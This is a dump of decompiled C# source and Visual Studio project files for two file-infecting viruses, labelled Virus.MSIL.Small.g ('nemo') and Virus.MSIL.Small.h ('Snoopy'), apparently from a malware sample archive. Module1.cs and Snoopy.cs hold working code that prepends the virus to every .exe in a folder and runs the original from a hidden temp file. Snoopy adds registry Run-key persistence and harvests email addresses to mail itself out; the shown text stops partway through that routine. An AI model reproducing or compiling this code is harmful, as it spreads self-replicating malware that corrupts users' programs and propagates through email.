EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTrademark("")]
[assembly: AssemblyTitle("nemo")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("nemo")]
[assembly: AssemblyCopyright("Copyright © vx13d 2006")]
[assembly: AssemblyCompany("vx13d")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("78f2b18e-8e1b-4d2b-95a1-83a8bcdf2469")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/Module1.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: nemo.Module1
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace nemo
{
[StandardModule]
internal sealed class Module1
{
public static void Replicate()
{
string str = Conversions.ToString(new Random().Next(1, 1000)) + ".exe";
object obj = (object) Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
string currentDirectory = Environment.CurrentDirectory;
FileStream input1 = new FileStream(Conversions.ToString(obj), FileMode.Open, FileAccess.Read);
BinaryReader binaryReader1 = new BinaryReader((Stream) input1);
byte[] numArray1 = new byte[checked ((int) input1.Length + 1)];
int num1 = checked ((int) (binaryReader1.BaseStream.Length - 1L));
int index1 = 0;
while (index1 <= num1)
{
numArray1[index1] = binaryReader1.ReadByte();
checked { ++index1; }
}
input1.Close();
binaryReader1.Close();
string[] files = Directory.GetFiles(currentDirectory, "*.exe");
int num2 = checked (files.Length - 1);
int index2 = 0;
while (index2 <= num2)
{
FileStream input2 = new FileStream(files[index2], FileMode.Open, FileAccess.Read);
BinaryReader binaryReader2 = new BinaryReader((Stream) input2);
byte[] numArray2 = new byte[checked ((int) input2.Length + 1)];
int num3 = checked ((int) (binaryReader2.BaseStream.Length - 1L));
int index3 = 0;
while (index3 <= num3)
{
numArray2[index3] = binaryReader2.ReadByte();
checked { ++index3; }
}
input2.Close();
binaryReader2.Close();
if (numArray2[60] != (byte) 128)
{
Console.WriteLine("File to infect:" + files[index2]);
FileStream output = new FileStream(files[index2], FileMode.Open, FileAccess.Write);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
int num4 = checked (numArray1.Length - 1);
int index4 = 0;
while (index4 <= num4)
{
binaryWriter.BaseStream.WriteByte(numArray1[index4]);
checked { ++index4; }
}
int num5 = checked (numArray2.Length - 1);
int index5 = 0;
while (index5 <= num5)
{
binaryWriter.BaseStream.WriteByte(numArray2[index5]);
checked { ++index5; }
}
binaryWriter.Close();
output.Close();
}
checked { ++index2; }
}
FileInfo fileInfo = new FileInfo(Conversions.ToString(obj));
int num6 = new int();
if (checked ((int) (fileInfo.Length - 28673L)) <= 0)
return;
if (File.Exists(str))
File.Delete(str);
FileStream fileStream = new FileStream(str, FileMode.CreateNew);
File.SetAttributes(str, FileAttributes.Hidden);
int length = checked ((int) fileInfo.Length);
int index6 = 28673;
while (index6 <= length)
{
fileStream.WriteByte(numArray1[index6]);
checked { ++index6; }
}
fileStream.Close();
try
{
Process.Start(str).WaitForExit();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
int num7 = (int) MessageBox.Show("This file is corrupt", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Hand);
ProjectData.ClearProjectError();
}
File.Delete(str);
}
[STAThread]
public static void Main() => Module1.Replicate();
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/My/MyApplication.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MyApplication
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace nemo.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MyComputer
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace nemo.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/My/MyProject.cs
+194
View File
@@ -0,0 +1,194 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MyProject
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace nemo.My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/My/MySettings.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MySettings
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace nemo.My
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default
{
get
{
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/My/MySettingsProperty.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MySettingsProperty
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace nemo.My
{
[HideModuleName]
[CompilerGenerated]
[StandardModule]
[DebuggerNonUserCode]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.Resources.Resources
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace nemo.My.Resources
{
[CompilerGenerated]
[HideModuleName]
[DebuggerNonUserCode]
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) nemo.My.Resources.Resources.resourceMan, (object) null))
nemo.My.Resources.Resources.resourceMan = new ResourceManager("nemo.Resources", typeof (nemo.My.Resources.Resources).Assembly);
return nemo.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => nemo.My.Resources.Resources.resourceCulture;
set => nemo.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/Virus.MSIL.Small.g.csproj
+51
View File
@@ -0,0 +1,51 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2849F21E-C193-4C69-A296-5AA86E6E4EB3}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>nemo</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>nemo</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/S/Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665/Virus.MSIL.Small.g.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "nemo", "Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.csproj", "{2849F21E-C193-4C69-A296-5AA86E6E4EB3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/S/Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740/AssemblyInfo.cs
+6
View File
@@ -0,0 +1,6 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: Guid("1f75ac90-f2a6-4cc9-8081-1b01a57ce9d3")]
[assembly: ComVisible(false)]
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Virus/MSIL/S/Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740/Program.cs
+32
View File
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: Snoopy.Program
// Assembly: Snoopy, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 225FC345-1E6A-4DC3-B737-1C6B8FCBFB0B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.exe
using System;
using System.IO;
using System.Threading;
namespace Snoopy
{
internal class Program
{
private static string myDir = Directory.GetCurrentDirectory();
private static Thread t;
private static void Main(string[] args)
{
Snoopy.Snoopy snoopy = new Snoopy.Snoopy();
snoopy.Replicate(Program.myDir);
if (snoopy.CheckReg())
{
Program.t = new Thread(new ThreadStart(snoopy.Send));
Program.t.Start();
}
if (DateTime.Now.Day != 8)
return;
snoopy.Message();
}
}
}
MSIL/Virus/MSIL/S/Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740/Snoopy.cs
+248
View File
@@ -0,0 +1,248 @@
// Decompiled with JetBrains decompiler
// Type: Snoopy.Snoopy
// Assembly: Snoopy, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 225FC345-1E6A-4DC3-B737-1C6B8FCBFB0B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Net.Mail;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using System.Windows.Forms;
namespace Snoopy
{
internal class Snoopy
{
private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
private string myDocs = Environment.GetFolderPath(Environment.SpecialFolder.Personal);
private ArrayList arrEmails = new ArrayList();
private ArrayList arInfect = new ArrayList();
[DllImport("dnsapi", EntryPoint = "DnsQuery_W", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int Dns(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string strName,
int intType,
int intOpt,
int intServer,
ref IntPtr pResult,
int intReserved);
public bool CheckReg()
{
string keyName = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
if (!((string) Registry.GetValue(keyName, nameof (Snoopy), (object) nameof (Snoopy)) == nameof (Snoopy)))
return false;
Registry.SetValue(keyName, nameof (Snoopy), (object) this.me);
return true;
}
public void Message()
{
int num = (int) MessageBox.Show("Infected with MSIL.Snoopy", nameof (Snoopy));
}
public void Replicate(string dir)
{
FileStream input1 = new FileStream(this.me, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader1 = new BinaryReader((Stream) input1);
byte[] numArray1 = new byte[input1.Length];
for (int index = 0; index < numArray1.Length; ++index)
numArray1[index] = binaryReader1.ReadByte();
input1.Close();
binaryReader1.Close();
string[] files = Directory.GetFiles(dir, "*.exe");
for (int index1 = 0; index1 < files.Length; ++index1)
{
FileStream input2 = new FileStream(files[index1], FileMode.Open, FileAccess.Read);
BinaryReader binaryReader2 = new BinaryReader((Stream) input2);
byte[] numArray2 = new byte[input2.Length];
for (int index2 = 0; index2 < numArray2.Length; ++index2)
numArray2[index2] = binaryReader2.ReadByte();
binaryReader2.Close();
input2.Close();
if (numArray2[60] != (byte) 128)
{
BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(files[index1], FileMode.Open, FileAccess.Write));
for (int index3 = 0; index3 < numArray1.Length; ++index3)
binaryWriter.BaseStream.WriteByte(numArray1[index3]);
for (int index4 = 0; index4 < numArray2.Length; ++index4)
binaryWriter.BaseStream.WriteByte(numArray2[index4]);
binaryWriter.Close();
input2.Close();
this.arInfect.Add((object) files[index1]);
}
}
FileInfo fileInfo = new FileInfo(this.me);
if ((int) fileInfo.Length - 20480 <= 0)
{
int num = (int) MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Hand);
Application.Exit();
}
else
{
try
{
string str = (DateTime.Now.Hour + DateTime.Now.Second + DateTime.Now.Minute).ToString() + ".exe";
FileStream fileStream = new FileStream(str, FileMode.CreateNew);
File.SetAttributes(str, FileAttributes.Hidden);
for (int index = 20480; (long) index < fileInfo.Length; ++index)
fileStream.WriteByte(numArray1[index]);
fileStream.Close();
try
{
Process.Start(str).WaitForExit();
}
catch (Exception ex)
{
int num = (int) MessageBox.Show("This file is corrupt", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
File.Delete(str);
Application.Exit();
}
catch (Exception ex)
{
}
}
}
public void Send()
{
this.arrEmails = this.SearchEmails(this.myDocs, "*.*");
ArrayList arrEmails = this.arrEmails;
arrEmails.Reverse();
string file = this.GetFile();
if (!(file != "") || this.arrEmails.Count <= 0)
return;
Attachment attachment = new Attachment(file);
IEnumerator enumerator = this.arrEmails.GetEnumerator();
ArrayList arrayList = new ArrayList();
while (enumerator.MoveNext())
{
string address1 = Convert.ToString(enumerator.Current);
foreach (object obj in arrEmails)
{
